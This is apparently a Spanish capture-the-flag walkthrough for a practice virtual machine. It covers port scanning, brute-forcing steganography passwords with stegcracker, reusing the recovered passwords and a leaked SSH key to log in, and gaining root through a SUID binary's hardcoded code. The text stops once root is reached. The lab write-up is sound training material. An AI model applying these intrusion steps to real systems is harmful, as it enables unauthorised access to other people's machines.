Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-28 03:11 EDT
Nmap scan report for 192.168.1.171
Host is up (0.00041s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 67:63:a0:c9:8b:7a:f3:42:ac:49:ab:a6:a7:3f:fc:ee (RSA)
| 256 8c:ce:87:47:f8:b8:1a:1a:78:e5:b7:ce:74:d7:f5:db (ECDSA)
|_ 256 92:94:66:0b:92:d3:cf:7e:ff:e8:bf:3c:7b:41:b7:5a (ED25519)
MAC Address: 08:00:27:A6:15:92 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.57 seconds
Veremos varias cosas interesantes, pero vamos a ver que contiene el puerto 80, a ver que pagina web hay y que podemos ver.
Si entramos no veremos gran cosa, unas imagenes y poco mas, pero nos comenta la pagina que la primera imagen es diferente a la segunda, por lo que podemos deducir que algo a nivel interno puede ser a lo que se este refiriendo, por lo que vamos a ver si podemos extraer algunos archivos de las imagenes.
Nos descargaremos las imagenes de la siguiente forma:
Una vez echo esto, vamos a probar a intentar extraer datos de la propia imagen sin ningun tipo de contraseña de la siguiente forma:
steghide/stegcracker
steghide extract -sf cat-hidden.jpg
Si dejamos el campo de la contraseña vacia veremos que no nos extrae nada, por lo que vamos a intentar a crackear dicha contraseña con una version de esta herramienta pero preparada para probar fuerza bruta llamada stegcracker:
stegcracker cat-hidden.jpg <WORDLIST>
Info:
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2025 - Luke Paris (Paradoxis)
StegCracker has been retired following the release of StegSeek, which
will blast through the rockyou.txt wordlist within 1.9 second as opposed
to StegCracker which takes ~5 hours.
StegSeek can be found at: https://github.com/RickdeJager/stegseek
Counting lines in wordlist..
Attacking file 'cat-hidden.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: sexymama
Tried 964 passwords
Your file has been written to: cat-hidden.jpg.out
sexymama
Veremos que la contraseña es sexymama de la imagen cat-hidden, vamos a probar con la otra tambien:
stegcracker cat-original.jpg <WORDLIST>
Info:
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2025 - Luke Paris (Paradoxis)
StegCracker has been retired following the release of StegSeek, which
will blast through the rockyou.txt wordlist within 1.9 second as opposed
to StegCracker which takes ~5 hours.
StegSeek can be found at: https://github.com/RickdeJager/stegseek
Counting lines in wordlist..
Attacking file 'cat-original.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: westlife
Tried 712 passwords
Your file has been written to: cat-original.jpg.out
westlife
Veremos que tambien nos saca la contraseña y para esta sera westlife por lo que vamos a extraer los archivos de cada imagen con dichas contraseñas de la siguiente forma:
steghide extract -sf cat-hidden.jpg
Metemos como contraseña sexymama y veremos que nos extrajo un archivo llamado mateo.txt.
steghide extract -sf cat-original.jpg
Metemos como contraseña westlife y veremos que nos extrajo un archivo llamado markus.txt.
Vamos a ver que contienen dichos archivos:
mateo.txt
thisismypassword
markus.txt
markuslovesbonita
Pueden ser las contraseñas de dichos usuarios como nombre de archivo, vamos a probar a meternos como markus a ver si nos deja por el servidor SSH.
Escalate user markus
SSH
ssh markus@<IP> -p 2222
Metemos como contraseña markuslovesbonita y veremos que estamos dentro.
Escalate user bonita
Si listamos la home de markus veremos una note.txt que pone lo siguiente:
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.
Vamos a probar a meternos con el usuario bonita mediante esta id_rsa:
nano id_rsa
#Dentro del nano
<ID_RSA_BONITA>
Lo guardamos y establecemos los permisos necesarios para que nos podamos conectar:
chmod 600 id_rsa
Ahora si nos conectamos:
ssh -i id_rsa bonita@<IP> -p 2222
Info:
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
bonita@twisted:~$ whoami
bonita
Veremos que estaremos dentro con dicho usuario, por lo que leeremos la flag del usuario.
user.txt
HMVblackcat
Escalate Privileges
Si listamos la home de dicho usuario, veremos un binario con permisos SUID:
-rwsrws--- 1 root bonita 16864 Oct 14 2020 beroot
Vamos a ver que contiene por dentro con la herramienta de ghidra, primero nos pasaremos el binario con un servidor de python3 de la siguiente forma:
python3 -m http.server
Ahora desde nuestro host haremos lo siguiente:
wget http://<IP>:8000/beroot
Una vez descargado abriremos ghidra y crearemos un proyecto nuevo, importamos el binario y lo analizamos, con esto ya podremos ver el codigo decompilado de dicho binario.
Veremos con el codigo decompilado en el main esta parte de aqui:
Vamos a ver como se veria en decimal ese hexadecimal en el cual esta haciendo la comparacion, ya que vemos que si obtenemos el codigo con el que se esta comparando vamos a poder tener una shell como el usuario root:
printf "%d\n" 0x16f8
Info:
5880
Vemos que el codigo en decimal es 5880 por lo que vamos a probar a meterlo a ver si es el correcto:
./beroot
Metemos como contraseña 5880.
Info:
root@twisted:~# whoami
root
Veremos que ha funcionado, por lo que ya seremos root y leeremos la flag de root: